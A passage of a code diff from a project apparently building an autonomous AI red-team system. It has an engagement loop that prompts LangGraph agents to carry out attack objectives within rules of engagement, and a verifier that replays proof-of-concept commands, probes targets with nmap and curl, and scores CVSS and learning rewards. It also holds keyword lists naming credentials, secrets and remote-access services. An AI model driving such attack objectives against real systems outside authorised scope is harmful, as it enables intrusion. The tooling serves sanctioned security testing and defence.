self._verifier.load_spec(finding_ref) + if spec is not None: + post = await self._verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + pre = self._verifier.load_snapshot(finding_ref, CheckPhase.PRE_DEFENSE) + evidence = await self._verifier.verify_blocked(spec, pre=pre, post=post) + reward = self._verifier.compute_reward(evidence) + self._verifier.persist_evidence(evidence) + self._verifier.persist_reward(reward) + return VerificationResult( + finding_ref=finding_ref, + defense_actions_applied=[], + re_attack_outcome=evidence.re_attack_outcome, + re_attack_details=( + f"env-verified reward={reward.reward:.1f} " + 
f"poc_hash={evidence.poc_evidence.output_hash}" + ), + ) + return self._load_verification_result(finding_ref) + + def _scan_findings(self) -> list[str]: + """Scan workspace/findings/ for FIND-*.md files. + + Returns a sorted list of finding refs (e.g. ``["FIND-001", "FIND-002"]``). + """ + findings_dir = self._workspace / "findings" + if not findings_dir.is_dir(): + log.debug("Findings directory does not exist: %s", findings_dir) + return [] + refs = sorted(p.stem for p in findings_dir.glob("FIND-*.md")) + log.debug("Scanned %d finding(s) from %s", len(refs), findings_dir) + return refs + + def _load_verification_result(self, finding_ref: str) -> VerificationResult | None: + """Load workspace/verification-{finding_ref}.json if it exists.""" + result_path = self._workspace / f"verification-{finding_ref}.json" + if not result_path.exists(): + log.debug("Verification result not found: %s", result_path) + return None + try: + data = json.loads(result_path.read_text(encoding="utf-8")) + return VerificationResult.model_validate(data) + except (OSError, ValueError) as exc: + log.error("Failed to load verification result %s: %s", result_path, exc) + return None + + def _generate_defense_brief(self, finding_ref: str) -> DefenseBrief | None: + """Parse a finding markdown file and produce a structured DefenseBrief. + + Returns ``None`` only when the finding file cannot be read. + Falls back to safe defaults when optional fields are absent. 
+ """ + finding_path = self._workspace / "findings" / f"{finding_ref}.md" + if not finding_path.exists(): + log.warning("Finding file not found: %s", finding_path) + return None + try: + content = finding_path.read_text(encoding="utf-8") + except OSError as exc: + log.error("Could not read finding %s: %s", finding_path, exc) + return None + + lines = content.splitlines() + title = "Unknown Finding" + severity = "medium" + attack_vector = "" + affected_assets: list[str] = [] + evidence_summary = "" + + # Title: first H1 heading + for line in lines: + stripped = line.strip() + if stripped.startswith("# "): + title = stripped[2:].strip() + break + + # Severity: line containing "**Severity**:" or "Severity:" + for line in lines: + lower = line.lower() + if "severity" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2: + candidate = parts[1].strip().strip("*").strip().lower() + if candidate in {"critical", "high", "medium", "low", "informational"}: + severity = candidate + break + + # Attack vector: line containing "Attack Vector:" or a following paragraph + capture_vector = False + vector_lines: list[str] = [] + for line in lines: + lower = line.lower() + if "attack vector" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + vector_lines = [parts[1].strip()] + break + capture_vector = True + continue + if capture_vector: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped: + vector_lines.append(stripped) + if len(vector_lines) >= 3: + break + if vector_lines: + attack_vector = " ".join(vector_lines) + + # Affected assets: lines under "**Affected**:" or "**Assets**:" + capture_assets = False + for line in lines: + lower = line.lower() + if ("affected" in lower or "assets" in lower) and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + for asset in parts[1].split(","): + asset = 
asset.strip() + if asset: + affected_assets.append(asset) + break + capture_assets = True + continue + if capture_assets: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped.startswith("-") or stripped.startswith("*"): + asset = stripped.lstrip("-* ").strip() + if asset: + affected_assets.append(asset) + + # Evidence summary: first non-empty line after "## Evidence" heading + capture_evidence = False + for line in lines: + stripped = line.strip() + if stripped.lower() in {"## evidence", "### evidence"}: + capture_evidence = True + continue + if capture_evidence: + if stripped.startswith("#"): + break + if stripped: + evidence_summary = stripped + break + + recommended_actions = self._infer_recommendations(attack_vector, severity) + + return DefenseBrief( + finding_ref=finding_ref, + finding_title=title, + severity=severity, + attack_vector=attack_vector, + affected_assets=affected_assets, + recommended_actions=recommended_actions, + evidence_summary=evidence_summary, + ) + + def _infer_recommendations( + self, attack_vector: str, severity: str + ) -> list[DefenseRecommendation]: + """Infer defensive recommendations from attack vector keywords.""" + lower = attack_vector.lower() + recommendations: list[DefenseRecommendation] = [] + priority = 1 + + if any(kw in lower for kw in ("port", "tcp", "udp", "service", "listen")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.BLOCK_PORT, + target="affected-port", + priority=priority, + rationale=( + "Attack vector references a network port or listening service — " + "block inbound access as an immediate containment measure" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("ssh", "ftp", "telnet", "smb", "rdp", "vnc")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.DISABLE_SERVICE, + target="affected-service", + priority=priority, + rationale=( + "Attack vector 
references a remote-access protocol — " + "disable or harden the service to remove the attack surface" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("credential", "password", "token", "key", "secret", "auth")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.REVOKE_CREDENTIAL, + target="compromised-credential", + priority=priority, + rationale=( + "Attack vector involves credentials or authentication — " + "revoke and rotate affected credentials immediately" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("config", "misconfigur", "permission", "acl", "setting")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.UPDATE_CONFIG, + target="affected-config", + priority=priority, + rationale=( + "Attack vector references a misconfiguration — " + "update the relevant configuration to enforce secure defaults" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("process", "pid", "daemon", "spawn", "exec")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.KILL_PROCESS, + target="affected-process", + priority=priority, + rationale=( + "Attack vector involves a running process — " + "terminate the process to halt active exploitation" + ), + ) + ) + priority += 1 + + # Always recommend a firewall rule for critical/high findings with no other actions + if severity in {"critical", "high"} and not recommendations: + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.ADD_FIREWALL_RULE, + target="affected-host", + priority=1, + rationale=( + f"High-severity finding ({severity}) with no specific vector keywords — " + "add a restrictive firewall rule as a precautionary measure" + ), + ) + ) + + return recommendations + + def _select_agent(self, objective: Objective) -> str: + """Map objective phase to a LangGraph assistant_id.""" + return self._config.agent_selection.get(objective.phase.value, "recon") + + 
async def _invoke_agent(self, agent_name: str, prompt: str) -> str: + """POST a run to the LangGraph API and return the final message content. + + Uses httpx (async, lightweight) to avoid hard dependency on langgraph_sdk. + If the API is unreachable the error is logged and an error string is + returned — the loop continues rather than crashing. + """ + thread_id = str(uuid.uuid4()) + url = f"{self._config.langgraph_url}/runs" + payload = { + "assistant_id": agent_name, + "thread_id": thread_id, + "input": {"messages": [{"role": "human", "content": prompt}]}, + } + + log.info("Invoking agent: name=%s thread=%s url=%s", agent_name, thread_id, url) + + try: + async with httpx.AsyncClient(timeout=600.0) as client: + response = await client.post(url, json=payload) + response.raise_for_status() + data = response.json() + + # Extract the final assistant message from the run result + output = self._extract_message(data) + log.debug("Agent %s responded (%.80s...)", agent_name, output) + return output + + except httpx.ConnectError as exc: + msg = f"[API_UNREACHABLE] Could not connect to LangGraph at {self._config.langgraph_url}: {exc}" + log.error(msg) + return msg + except httpx.HTTPStatusError as exc: + msg = f"[API_ERROR] LangGraph returned {exc.response.status_code}: {exc.response.text[:200]}" + log.error(msg) + return msg + except Exception as exc: + msg = f"[INVOKE_ERROR] Unexpected error invoking {agent_name}: {exc}" + log.error(msg) + return msg + + def _extract_message(self, data: object) -> str: + """Extract the final assistant message text from a LangGraph run response.""" + if not isinstance(data, dict): + return str(data) + + # LangGraph run result: {"output": {"messages": [...]}} + output = data.get("output") or data + if isinstance(output, dict): + messages = output.get("messages", []) + if isinstance(messages, list): + for msg in reversed(messages): + if isinstance(msg, dict) and msg.get("type") == "ai": + content = msg.get("content", "") + if 
isinstance(content, str): + return content + if isinstance(content, list): + parts = [ + c.get("text", "") + for c in content + if isinstance(c, dict) and c.get("type") == "text" + ] + return " ".join(p for p in parts if p) + + return json.dumps(data) + + def _build_attack_prompt(self, objective: Objective) -> str: + """Build the per-iteration prompt injected into the fresh agent context.""" + assert self._state is not None + + # Summarize prior findings from disk — include title for sub-agent context + findings_dir = self._workspace / "findings" + prior_findings: list[str] = [] + if findings_dir.is_dir(): + for p in sorted(findings_dir.glob("FIND-*.md")): + title = "" + try: + for line in p.read_text(encoding="utf-8").splitlines(): + if line.startswith("# "): + title = line[2:].strip() + break + except OSError: + pass # state persist failure is non-fatal + prior_findings.append(f"{p.stem}: {title}" if title else p.stem) + + roe_path = self._workspace / "plan" / "roe.json" + roe_scope = "" + if roe_path.exists(): + try: + roe_data = json.loads(roe_path.read_text(encoding="utf-8")) + in_scope = roe_data.get("in_scope", []) + out_of_scope = roe_data.get("out_of_scope", []) + roe_scope = ( + f"In-scope: {', '.join(str(s) for s in in_scope) or 'all'}\n" + f"Out-of-scope: {', '.join(str(s) for s in out_of_scope) or 'none'}" + ) + except (OSError, ValueError) as exc: + log.warning("Could not read RoE: %s", exc) + + criteria_block = "\n".join(f" - {c}" for c in objective.acceptance_criteria) + findings_block = ( + "\n".join(f" - {f}" for f in prior_findings) if prior_findings else " none yet" + ) + + return ( + f"## Ralph Iteration {self._state.iteration}\n\n" + f"Workspace: {self._workspace}\n" + f"Target: {self._config.target}\n\n" + f"### Current Objective\n" + f"ID: {objective.id}\n" + f"Phase: {objective.phase.value}\n" + f"Title: {objective.title}\n" + f"Description: {objective.description}\n" + f"OPSEC: {objective.opsec.value}" + + (f" — {objective.opsec_notes}" if 
objective.opsec_notes else "") + + f"\n" + f"Acceptance Criteria:\n{criteria_block}\n\n" + f"### Prior Findings\n" + f"{findings_block}\n\n" + + (f"### Rules of Engagement\n{roe_scope}\n\n" if roe_scope else "") + + "Execute the objective. Write findings to workspace/findings/FIND-NNN.md. " + "Signal OBJECTIVE PASSED or OBJECTIVE BLOCKED when done." + ) + + def _next_pending_objective(self) -> Objective | None: + """Return the highest-priority pending objective whose dependencies are met.""" + if self._opplan is None: + return None + + completed_ids = set(self._state.objectives_completed) if self._state else set() + + candidates = [ + obj + for obj in self._opplan.objectives + if obj.status == ObjectiveStatus.PENDING + and all(dep in completed_ids for dep in obj.blocked_by) + ] + + if not candidates: + return None + + return min(candidates, key=lambda o: o.priority) + + def _parse_objective_result( + self, + response: str, + objective: Objective, + agent: str, + start: float, + ) -> IterationResult: + """Parse OBJECTIVE PASSED/BLOCKED signal and FIND-NNN refs from agent response.""" + upper = response.upper() + + if "OBJECTIVE PASSED" in upper: + outcome = "PASSED" + elif "OBJECTIVE BLOCKED" in upper: + outcome = "BLOCKED" + else: + # No explicit signal — treat as blocked so the loop doesn't stall + outcome = "BLOCKED" + log.warning( + "Objective %s: no PASSED/BLOCKED signal in response — defaulting to BLOCKED", + objective.id, + ) + + # Extract FIND-NNN references + findings = re.findall(r"\bFIND-\d{3,}\b", response) + unique_findings = list(dict.fromkeys(findings)) # preserve order, deduplicate + + return IterationResult( + objective_id=objective.id, + agent_used=agent, + outcome=outcome, + findings_produced=unique_findings, + duration_seconds=round(time.time() - start, 2), + raw_output=response, + ) + + def _load_opplan(self) -> OPPLAN | None: + """Read and validate workspace/plan/opplan.json.""" + opplan_path = self._workspace / "plan" / "opplan.json" + if not 
opplan_path.exists(): + log.debug("opplan.json not found at %s", opplan_path) + return None + try: + data = json.loads(opplan_path.read_text(encoding="utf-8")) + return OPPLAN.model_validate(data) + except (OSError, ValueError) as exc: + log.error("Failed to load opplan.json: %s", exc) + return None + + def _update_opplan_objective(self, obj_id: str, status: ObjectiveStatus) -> None: + """Load opplan, update one objective's status, and write back to disk.""" + opplan_path = self._workspace / "plan" / "opplan.json" + if not opplan_path.exists(): + log.warning("Cannot update objective %s — opplan.json missing", obj_id) + return + try: + data = json.loads(opplan_path.read_text(encoding="utf-8")) + updated = False + for obj in data.get("objectives", []): + if obj.get("id") == obj_id: + obj["status"] = status.value + updated = True + break + if updated: + opplan_path.write_text(json.dumps(data, indent=2), encoding="utf-8") + log.debug("Updated objective %s → %s", obj_id, status.value) + else: + log.warning("Objective %s not found in opplan.json", obj_id) + except (OSError, ValueError) as exc: + log.error("Failed to update opplan objective %s: %s", obj_id, exc) + + def _recover_stale_objectives(self) -> None: + """Reset any IN_PROGRESS objectives back to PENDING. + + The engagement loop marks an objective IN_PROGRESS, invokes the agent, + then updates to COMPLETED or BLOCKED. If the process crashes between + the first and second write, the objective is left orphaned at + IN_PROGRESS. _next_pending_objective() only considers PENDING + objectives, so the orphan is never retried. + + On startup, scan and reset so the loop can pick them up again. 
+ """ + if self._opplan is None: + return + stale = [o for o in self._opplan.objectives if o.status == ObjectiveStatus.IN_PROGRESS] + if not stale: + return + log.warning( + "Resetting %d stale IN_PROGRESS objective(s) to PENDING: %s", + len(stale), + ", ".join(o.id for o in stale), + ) + for obj in stale: + self._update_opplan_objective(obj.id, ObjectiveStatus.PENDING) + + +# ── Convenience entry point ──────────────────────────────────────────────────── + + +async def run_engagement( + workspace: str | Path, + config: EngagementConfig | None = None, +) -> EngagementState: + """Entry point for the engagement loop. + + Args: + workspace: Path to the engagement workspace directory. + config: Engagement configuration. If ``None``, a default config is used + with ``target="unknown"`` — suitable for resuming an existing + engagement where the target is already recorded in state. + + Returns: + The final :class:`EngagementState` after the loop completes. + """ + workspace = Path(workspace) + workspace.mkdir(parents=True, exist_ok=True) + if config is None: + config = EngagementConfig(target="unknown") + loop = EngagementLoop(workspace, config) + return await loop.run() diff --git a/decepticon/core/env_verifier.py b/decepticon/core/env_verifier.py new file mode 100644 index 00000000..e803f53d --- /dev/null +++ b/decepticon/core/env_verifier.py @@ -0,0 +1,727 @@ +"""Independent environment verifier — no LLM in the verification path.""" + +from __future__ import annotations + +import hashlib +import json +import logging +import math +import re +import time +from pathlib import Path +from typing import Any + +from decepticon.schemas.defense_brief import ReAttackOutcome +from decepticon.schemas.env_verification import ( + BaselineEvidence, + CheckPhase, + CVSSEstimate, + EnvironmentSnapshot, + PoCConsensus, + PoCEvidence, + PoCRunResult, + RLVRReward, + TargetCheckResult, + VerificationEvidence, +) +from decepticon.schemas.exploit_spec import ( + CommandOutputCheck, + 
CredentialCheck, + ExploitSpec, + FileCheck, + PortCheck, + ServiceCheck, + TargetCheck, +) +from decepticon.tools.research.poc import PoCRunner, _hash_output, _match_signals + +log = logging.getLogger("decepticon.core.env_verifier") + + +# CVSS 3.1 metric weights +_CVSS_AV: dict[str, float] = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2} +_CVSS_AC: dict[str, float] = {"L": 0.77, "H": 0.44} +_CVSS_PR_U: dict[str, float] = {"N": 0.85, "L": 0.62, "H": 0.27} +_CVSS_PR_C: dict[str, float] = {"N": 0.85, "L": 0.68, "H": 0.50} +_CVSS_UI: dict[str, float] = {"N": 0.85, "R": 0.62} +_CVSS_CIA: dict[str, float] = {"N": 0.0, "L": 0.22, "H": 0.56} + + +def _cvss_roundup(value: float) -> float: + """Round up to nearest 0.1 per CVSS 3.1 spec.""" + int_val = int(round(value * 100000)) + if int_val % 10000 == 0: + return int_val / 100000.0 + return (math.floor(int_val / 10000.0) + 1) / 10.0 + + +class EnvironmentVerifier: + """Replays ExploitSpec against the sandbox to produce grounded RLVRReward. + + No LLM is in the verification path. 
All reward signal comes from: + - PoC command exit code + regex signal matching + - Environment probe flips (pre → post defense) + - ZFP negative control demotion + """ + + def __init__( + self, + workspace: Path, + runner: PoCRunner, + http_session: Any = None, + ) -> None: + self._workspace = workspace + self._runner = runner + self._http = http_session + + # ── Spec I/O ────────────────────────────────────────────────────────── + + def load_spec(self, finding_ref: str) -> ExploitSpec | None: + path = self._workspace / "findings" / f"{finding_ref}-exploit-spec.json" + if not path.exists(): + return None + try: + return ExploitSpec.model_validate_json(path.read_text(encoding="utf-8")) + except Exception as exc: + log.warning("Could not load exploit spec for %s: %s", finding_ref, exc) + return None + + def load_snapshot(self, finding_ref: str, phase: CheckPhase) -> EnvironmentSnapshot | None: + path = self._workspace / "verification" / f"{finding_ref}-{phase.value}-snapshot.json" + if not path.exists(): + return None + try: + return EnvironmentSnapshot.model_validate_json(path.read_text(encoding="utf-8")) + except Exception as exc: + log.warning("Could not load snapshot %s/%s: %s", finding_ref, phase, exc) + return None + + # ── Environment probing ─────────────────────────────────────────────── + + async def capture_state(self, spec: ExploitSpec, phase: CheckPhase) -> EnvironmentSnapshot: + results: list[TargetCheckResult] = [] + for i, check in enumerate(spec.target_checks): + check_id = f"{spec.finding_ref}-{phase.value}-{i}" + result = await self._run_check(check_id, check, phase) + results.append(result) + return EnvironmentSnapshot( + finding_ref=spec.finding_ref, + phase=phase, + results=results, + captured_at=time.time(), + ) + + async def _run_check( + self, check_id: str, check: TargetCheck, phase: CheckPhase + ) -> TargetCheckResult: + try: + if isinstance(check, PortCheck): + return await self._check_port(check_id, check, phase) + elif isinstance(check, 
ServiceCheck): + return await self._check_service(check_id, check, phase) + elif isinstance(check, (CredentialCheck, CommandOutputCheck)): + return await self._check_command(check_id, check, phase) + elif isinstance(check, FileCheck): + return await self._check_file(check_id, check, phase) + else: + return TargetCheckResult( + check_id=check_id, + kind="unknown", + phase=phase, + signal={}, + positive=False, + raw_excerpt="unknown check kind", + ) + except Exception as exc: + log.warning("Check %s failed: %s", check_id, exc) + return TargetCheckResult( + check_id=check_id, + kind=getattr(check, "kind", "unknown"), + phase=phase, + signal={"error": str(exc)}, + positive=False, + raw_excerpt=str(exc)[:500], + ) + + async def _check_port( + self, check_id: str, check: PortCheck, phase: CheckPhase + ) -> TargetCheckResult: + cmd = f"nmap -p {check.port} {check.host} --open -oG - 2>/dev/null | grep -c 'open'" + stdout, stderr, _code = await self._runner(cmd) + combined = f"{stdout}\n{stderr}" + is_open = bool(re.search(r"[1-9]", stdout.strip())) + return TargetCheckResult( + check_id=check_id, + kind="port", + phase=phase, + signal={"host": check.host, "port": check.port, "open": is_open}, + positive=is_open, + raw_excerpt=combined[:500], + ) + + async def _check_service( + self, check_id: str, check: ServiceCheck, phase: CheckPhase + ) -> TargetCheckResult: + cmd = f"curl -s -o /tmp/_svc_check -w '%{{http_code}}' --max-time 10 {check.url!r}" + stdout, _stderr, _code = await self._runner(cmd) + status_str = stdout.strip() + try: + status = int(status_str) + except ValueError: + status = 0 + status_ok = status == check.expected_status + body_ok = True + raw = "" + if check.body_pattern: + body_stdout, _, _ = await self._runner("cat /tmp/_svc_check 2>/dev/null || true") + raw = body_stdout[:500] + body_ok = bool(re.search(check.body_pattern, body_stdout, re.DOTALL | re.IGNORECASE)) + positive = status_ok and body_ok + return TargetCheckResult( + check_id=check_id, + 
kind="service", + phase=phase, + signal={"url": check.url, "status": status, "body_match": body_ok}, + positive=positive, + raw_excerpt=raw or status_str, + ) + + async def _check_command( + self, + check_id: str, + check: CredentialCheck | CommandOutputCheck, + phase: CheckPhase, + ) -> TargetCheckResult: + cmd = check.command + pattern = check.success_pattern if isinstance(check, CredentialCheck) else check.pattern + expect = True if isinstance(check, CredentialCheck) else check.expect_match + stdout, stderr, code = await self._runner(cmd) + combined = f"{stdout}\n{stderr}" + matched = bool(re.search(pattern, combined, re.DOTALL | re.IGNORECASE)) + positive = matched if expect else not matched + return TargetCheckResult( + check_id=check_id, + kind=check.kind, + phase=phase, + signal={"matched": matched, "expect_match": expect, "exit_code": code}, + positive=positive, + raw_excerpt=combined[:500], + ) + + async def _check_file( + self, check_id: str, check: FileCheck, phase: CheckPhase + ) -> TargetCheckResult: + stdout, _, _ = await self._runner(f"test -f {check.path!r} && echo EXISTS || echo MISSING") + exists = "EXISTS" in stdout + exists_ok = exists == check.must_exist + content_ok = True + raw = "" + if check.content_pattern and exists: + cat_out, _, _ = await self._runner(f"cat {check.path!r} 2>/dev/null || true") + raw = cat_out[:500] + content_ok = bool(re.search(check.content_pattern, cat_out, re.DOTALL | re.IGNORECASE)) + positive = exists_ok and content_ok + return TargetCheckResult( + check_id=check_id, + kind="file", + phase=phase, + signal={ + "path": check.path, + "exists": exists, + "content_match": content_ok, + }, + positive=positive, + raw_excerpt=raw or stdout[:200], + ) + + # ── PoC consensus ───────────────────────────────────────────────────── + + async def _run_poc_once(self, spec: ExploitSpec, run_index: int) -> PoCRunResult: + stdout, stderr, exit_code = await self._runner(spec.poc_command) + combined = f"{stdout}\n{stderr}" + signals = 
_match_signals(combined, spec.success_patterns) + return PoCRunResult( + run_index=run_index, + exit_code=exit_code, + signals_matched=signals, + output_hash=_hash_output(stdout, stderr, exit_code), + stdout_excerpt=stdout[:1600], + stderr_excerpt=stderr[:800], + succeeded=len(signals) > 0, + ) + + async def _run_poc_consensus(self, spec: ExploitSpec) -> PoCConsensus: + run_results: list[PoCRunResult] = [] + for i in range(spec.runs): + result = await self._run_poc_once(spec, i) + run_results.append(result) + + n_success = sum(1 for r in run_results if r.succeeded) + success_rate = n_success / spec.runs + + successful_signal_sets = [set(r.signals_matched) for r in run_results if r.succeeded] + agreed_signals: list[str] = [] + if successful_signal_sets: + agreed_signals = list(set.intersection(*successful_signal_sets)) + + zfp_demoted = False + if spec.negative_command and agreed_signals: + n_out, n_err, _ = await self._runner(spec.negative_command) + n_combined = f"{n_out}\n{n_err}" + if _match_signals(n_combined, spec.success_patterns): + log.warning("%s: ZFP demotion — negative control matched", spec.finding_ref) + zfp_demoted = True + agreed_signals = [] + + return PoCConsensus( + n_runs=spec.runs, + n_success=n_success, + success_rate=success_rate, + agreed_signals=agreed_signals, + zfp_demoted=zfp_demoted, + run_results=run_results, + ) + + async def verify_baseline(self, spec: ExploitSpec) -> BaselineEvidence: + consensus = await self._run_poc_consensus(spec) + valid = ( + not consensus.zfp_demoted + and consensus.success_rate >= spec.min_success_rate + and len(consensus.agreed_signals) > 0 + ) + if not valid: + log.warning( + "%s: baseline PoC invalid (rate=%.2f zfp=%s signals=%s)", + spec.finding_ref, + consensus.success_rate, + consensus.zfp_demoted, + consensus.agreed_signals, + ) + return BaselineEvidence( + finding_ref=spec.finding_ref, + valid=valid, + consensus=consensus, + ) + + # ── Impact + inconclusive + CVSS ────────────────────────────────────── 
+ + def _match_impact_patterns(self, spec: ExploitSpec, combined: str) -> list[str]: + if not spec.impact_patterns: + return [] + return _match_signals(combined, spec.impact_patterns) + + def _check_inconclusive( + self, pre: EnvironmentSnapshot | None, post: EnvironmentSnapshot + ) -> bool: + if pre is None or len(pre.results) < 2: + return False + host_port_map: dict[str, bool] = {} + host_service_map: dict[str, bool] = {} + + for result in post.results: + sig = result.signal + if result.kind == "port": + key = f"{sig.get('host')}:{sig.get('port')}" + host_port_map[key] = result.positive + elif result.kind == "service": + url = str(sig.get("url", "")) + host = url.split("/")[2] if "/" in url else url + host_service_map[host] = result.positive + + for url_host, svc_positive in host_service_map.items(): + for port_key, port_positive in host_port_map.items(): + if port_key.startswith(url_host) and svc_positive != port_positive: + return True + return False + + def _estimate_cvss( + self, + spec: ExploitSpec, + consensus: PoCConsensus, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + ) -> CVSSEstimate: + # Default: network attack vector if any port/service check, else local + attack_vector = "L" + for check in spec.target_checks: + if isinstance(check, (PortCheck, ServiceCheck)): + attack_vector = "N" + break + + attack_complexity = "L" + privileges_required = "N" + user_interaction = "N" + scope = "U" + + # Credentials needed → privs required low + for check in spec.target_checks: + if isinstance(check, CredentialCheck): + privileges_required = "L" + break + + confidentiality = "N" + integrity = "N" + availability = "N" + + # Inspect impact patterns to derive CIA + impact_blob = " ".join(spec.impact_patterns) + if re.search(r"uid=0|root:|SYSTEM", impact_blob, re.IGNORECASE): + confidentiality = "H" + integrity = "H" + scope = "C" + if re.search(r"email|password|secret|key|token", impact_blob, re.IGNORECASE): + confidentiality = "H" + if 
re.search(r"RCE|exec|shell|cmd", impact_blob, re.IGNORECASE): + integrity = "H" + availability = "H" + + # No impact patterns → low impact + if not spec.impact_patterns: + confidentiality = "L" if consensus.agreed_signals else "N" + + c = _CVSS_CIA[confidentiality] + i_val = _CVSS_CIA[integrity] + a = _CVSS_CIA[availability] + isc_base = 1 - (1 - c) * (1 - i_val) * (1 - a) + if scope == "U": + impact_sub = 6.42 * isc_base + pr_weight = _CVSS_PR_U[privileges_required] + else: + impact_sub = 7.52 * (isc_base - 0.029) - 3.25 * (isc_base - 0.02) ** 15 + pr_weight = _CVSS_PR_C[privileges_required] + + exploitability = ( + 8.22 + * _CVSS_AV[attack_vector] + * _CVSS_AC[attack_complexity] + * pr_weight + * _CVSS_UI[user_interaction] + ) + + if impact_sub <= 0: + base_score = 0.0 + else: + if scope == "U": + base_score = _cvss_roundup(min(10.0, impact_sub + exploitability)) + else: + base_score = _cvss_roundup(min(10.0, 1.08 * (impact_sub + exploitability))) + + vector = ( + f"CVSS:3.1/AV:{attack_vector}/AC:{attack_complexity}/PR:{privileges_required}" + f"/UI:{user_interaction}/S:{scope}/C:{confidentiality}/I:{integrity}/A:{availability}" + ) + + return CVSSEstimate( + attack_vector=attack_vector, + attack_complexity=attack_complexity, + privileges_required=privileges_required, + user_interaction=user_interaction, + scope=scope, + confidentiality=confidentiality, + integrity=integrity, + availability=availability, + base_score=base_score, + vector_string=vector, + ) + + # ── Dedup ───────────────────────────────────────────────────────────── + + def _compute_fingerprint(self, spec: ExploitSpec) -> str: + parts = [ + spec.poc_command.strip(), + ",".join(sorted(spec.success_patterns)), + spec.target_host or "", + ] + return hashlib.sha256("|".join(parts).encode()).hexdigest()[:16] + + def _dedup_path(self) -> Path: + return self._workspace / "rlvr" / "dedup.jsonl" + + def is_duplicate(self, spec: ExploitSpec) -> bool: + path = self._dedup_path() + if not path.exists(): + 
return False + fp = self._compute_fingerprint(spec) + try: + for line in path.read_text(encoding="utf-8").splitlines(): + if not line.strip(): + continue + try: + entry = json.loads(line) + except json.JSONDecodeError: + continue + if entry.get("fingerprint") == fp and entry.get("finding_ref") != spec.finding_ref: + return True + except OSError: + return False + return False + + def _get_duplicate_ref(self, spec: ExploitSpec) -> str | None: + path = self._dedup_path() + if not path.exists(): + return None + fp = self._compute_fingerprint(spec) + try: + for line in path.read_text(encoding="utf-8").splitlines(): + if not line.strip(): + continue + try: + entry = json.loads(line) + except json.JSONDecodeError: + continue + if entry.get("fingerprint") == fp and entry.get("finding_ref") != spec.finding_ref: + ref = entry.get("finding_ref") + return str(ref) if ref is not None else None + except OSError: + return None + return None + + def _register_fingerprint(self, spec: ExploitSpec) -> None: + path = self._dedup_path() + path.parent.mkdir(parents=True, exist_ok=True) + entry = { + "fingerprint": self._compute_fingerprint(spec), + "finding_ref": spec.finding_ref, + "registered_at": time.time(), + } + with path.open("a", encoding="utf-8") as f: + f.write(json.dumps(entry) + "\n") + + # ── Verification entrypoint ─────────────────────────────────────────── + + async def verify_blocked( + self, + spec: ExploitSpec, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + baseline: BaselineEvidence | None = None, + ) -> VerificationEvidence: + # 1. Check duplicate + is_dup = self.is_duplicate(spec) + dup_ref: str | None = None + if is_dup: + dup_ref = self._get_duplicate_ref(spec) + log.info("%s: duplicate of %s — skipping PoC re-run", spec.finding_ref, dup_ref) + else: + self._register_fingerprint(spec) + + # 2. Baseline validity gate + baseline_valid = True + if baseline is not None: + baseline_valid = baseline.valid + + # 3. 
N-run consensus PoC + consensus = await self._run_poc_consensus(spec) + + # 4. Match impact patterns over all run output + all_run_output = "\n".join( + r.stdout_excerpt + r.stderr_excerpt for r in consensus.run_results + ) + impact_signals = self._match_impact_patterns(spec, all_run_output) + + # 5. Inconclusive check + inconclusive = self._check_inconclusive(pre, post) + + # 6. CVSS estimate + cvss = self._estimate_cvss(spec, consensus, pre, post) + + # 7. Build legacy PoCEvidence (backward compat) + best_run = max(consensus.run_results, key=lambda r: len(r.signals_matched), default=None) + legacy_poc = PoCEvidence( + exit_code=best_run.exit_code if best_run else -1, + success_signals_matched=consensus.agreed_signals, + zfp_demoted=consensus.zfp_demoted, + output_hash=best_run.output_hash if best_run else "", + stdout_excerpt=best_run.stdout_excerpt if best_run else "", + stderr_excerpt=best_run.stderr_excerpt if best_run else "", + ) + + # 8. Determine outcome + outcome = self._determine_outcome_v2( + consensus=consensus, + baseline_valid=baseline_valid, + inconclusive=inconclusive, + pre=pre, + post=post, + is_duplicate=is_dup, + success_rate_threshold=spec.min_success_rate, + ) + + return VerificationEvidence( + finding_ref=spec.finding_ref, + pre_snapshot=pre, + post_snapshot=post, + poc_evidence=legacy_poc, + re_attack_outcome=outcome, + verified_at=time.time(), + baseline_evidence=baseline, + consensus=consensus, + impact_signals_matched=impact_signals, + cvss_estimate=cvss, + duplicate_of=dup_ref, + baseline_valid=baseline_valid, + inconclusive=inconclusive, + ) + + def _determine_outcome( + self, + poc: PoCEvidence, + pre: EnvironmentSnapshot | None, + post: EnvironmentSnapshot, + ) -> ReAttackOutcome: + if poc.zfp_demoted: + return ReAttackOutcome.ERROR + if not poc.success_signals_matched: + return ReAttackOutcome.BLOCKED + # Signals still matched — check if any environment checks flipped + if pre is None: + return ReAttackOutcome.PASSED + 
